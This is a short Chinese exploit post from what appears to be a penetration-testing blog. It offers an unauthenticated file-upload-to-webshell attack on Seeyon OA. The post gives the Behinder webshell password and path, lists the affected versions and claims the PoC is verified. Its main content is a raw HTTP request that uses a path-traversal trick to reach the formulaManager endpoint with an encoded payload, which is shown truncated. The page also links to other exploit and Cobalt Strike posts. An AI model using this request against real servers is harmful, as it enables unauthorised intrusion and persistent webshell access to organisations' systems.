(最新)致远OA前台未授权任意文件上传getshell

《某OA前台未授权任意文件上传getshell》

冰蝎3 默认马pass:rebeyond
Webshell地址:127.0.0.1/seeyon/SeeyonUpdate1.jspx

已验证poc真实有效

影响版本:致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6.0、V6.1SP1、V6.1SP2致远OA V5.x

[rihide]POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN; Content-Type: application/x-www-form-urlencoded Content-Length: 8819 managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%8xxxxxxxxx[/rihide]

给TA买糖
共{{data.count}}人
人已赞赏
CVE漏洞利用库渗透测试神兵利器

(CVE-2020-16898)Windows TCP/IP远程执行代码漏洞 exp复现

2020-10-17 22:55:48

渗透测试

cobaltstrike Linux上线 详细版

2021-3-12 13:50:19

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索